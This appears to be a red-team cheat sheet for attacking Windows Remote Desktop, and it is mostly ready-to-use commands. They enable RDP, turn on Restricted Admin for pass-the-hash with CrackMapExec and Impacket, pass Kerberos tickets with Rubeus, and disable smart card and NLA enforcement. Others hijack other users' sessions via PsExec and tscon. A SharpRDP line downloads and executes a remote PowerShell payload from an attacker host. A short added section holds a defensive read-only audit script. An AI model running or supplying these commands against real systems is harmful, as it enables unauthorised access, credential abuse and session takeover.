Terminal Services API
qwinsta
Enable RDP
With meterpreter:
meterpreter > run getgui -e
With PowerShell:
PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
PS > Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
PS > Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1
Manually add firewall rule (if necessary):
Cmd > netsh advfirewall firewall add rule name="Allow Remote Desktop" dir=in protocol=TCP localport=3389 action=allow
PS > New-NetFirewallRule -DisplayName 'Allow Remote Desktop' -Profile @('Domain', 'Private') -Direction Inbound -Action Allow -Protocol TCP -LocalPort @('3389')
Restricted Admin
RDP with PtH: RDP needs a plaintext password unless Restricted Admin mode is enabled.
Check / enable / disable with PowerShell:
PS > Get-ChildItem "HKLM:\System\CurrentControlSet\Control\Lsa" -Recurse
PS > Get-Item "HKLM:\System\CurrentControlSet\Control\Lsa"
PS > New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 0 -PropertyType "DWORD"
PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin"
PS > Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value 1
PS > Remove-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin"
Check / enable / disable with Impacket:
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -s
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 0
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\System\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin -vt REG_DWORD -vd 1
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 delete -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\Lsa' -v DisableRestrictedAdmin
Enable with CME:
$ cme smb 192.168.1.11 -u Administrator -H fc525c9683e8fe067095ba2ddc971889 -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'
Usage:
$ xfreerdp /pth ...
Cmd > mstsc.exe /restrictedAdmin ...
Remote Credential Guard
Cmd > ksetup /addkdc MEGACORP.LOCAL dc01.megacorp.local
Cmd > ksetup /setrealmflags MEGACORP.LOCAL tcpsupported
Cmd > shutdown -r -t 0
Cmd > Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:dc01.megacorp.local /aes256:<AES_KEY> /opsec /nowrap /ptt
Cmd > Rubeus.exe asktgs /ticket:<TICKET> /service:TERMSRV/PC01.megacorp.local,CIFS/PC01.megacorp.local,HOST/PC01.megacorp.local /domain:megacorp.local /dc:dc01.megacorp.local /nowrap /ptt
Cmd > mstsc.exe /remoteGuard ...
Smart Card Authentication
Disable enforced smart card authentication during interactive logon:
PS > Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\System" -Name "scforceoption"
PS > Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\System" -Name "scforceoption" -Value 0
Emulating PIV
NLA
Disable NLA:
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired
PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0)
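The registry values and firewall rules changed in the sections above can be checked for drift with a read-only audit. This is an added example, not part of the original page; the `Allowed` baseline is an assumption (a host where RDP should be off and smart card logon is enforced) and should be adjusted to local policy.

```powershell
# Added example (not from the original page): read-only audit of the RDP-related
# registry values covered above. The Allowed lists are an assumed baseline;
# $null in an Allowed list means "value absent is acceptable".
$checks = @(
    @{ Path    = 'HKLM:\System\CurrentControlSet\Control\Terminal Server'
       Name    = 'fDenyTSConnections'; Allowed = @(1)
       Meaning = '0 = RDP connections accepted' }
    @{ Path    = 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
       Name    = 'UserAuthentication'; Allowed = @(1)
       Meaning = '0 = NLA not required' }
    @{ Path    = 'HKLM:\System\CurrentControlSet\Control\Lsa'
       Name    = 'DisableRestrictedAdmin'; Allowed = @($null, 1)
       Meaning = '0 = Restricted Admin enabled (RDP accepts PtH)' }
    @{ Path    = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\policies\System'
       Name    = 'scforceoption'; Allowed = @(1)
       Meaning = '0 or absent = smart card not enforced' }
)

$report = foreach ($c in $checks) {
    # A missing value yields no object, so $value stays $null ("absent").
    $item  = Get-ItemProperty -Path $c.Path -Name $c.Name -ErrorAction SilentlyContinue
    $value = if ($item) { $item.($c.Name) } else { $null }
    [pscustomobject]@{
        Name      = $c.Name
        Value     = if ($null -eq $value) { '<absent>' } else { $value }
        Compliant = $value -in $c.Allowed
        Meaning   = $c.Meaning
    }
}
$report | Format-Table -AutoSize

# Enabled inbound rules: the built-in "Remote Desktop" group plus the manually
# added rule name used on this page. Display group names are localized, so an
# empty result on a non-English host is inconclusive.
$rules  = @(Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue)
$rules += @(Get-NetFirewallRule -DisplayName 'Allow Remote Desktop' -ErrorAction SilentlyContinue)
$rules | Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' } |
    Select-Object DisplayName, Profile, Action
```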
Hijack RDP Sessions
Run Task Manager as LocalSystem to hijack other users' sessions:
PS > .\PsExec64.exe -si C:\Windows\System32\Taskmgr.exe -accepteula
The same can be achieved with tscon.exe:
PS > .\PsExec64.exe -s \\localhost cmd
PS > quser.exe
PS > cmd /k tscon.exe <ID> /dest:<CURRENT_SESSIONNAME>
Tools
SharpRDP
Cmd > .\SharpRDP.exe computername=srv01 command="iex(new-object net.webclient).downloadstring('http://10.10.13.37:8080/grunt.ps1')" username=megacorp\snovvcrash password=Passw0rd!
SharpRDPHijack
TakeMyRDP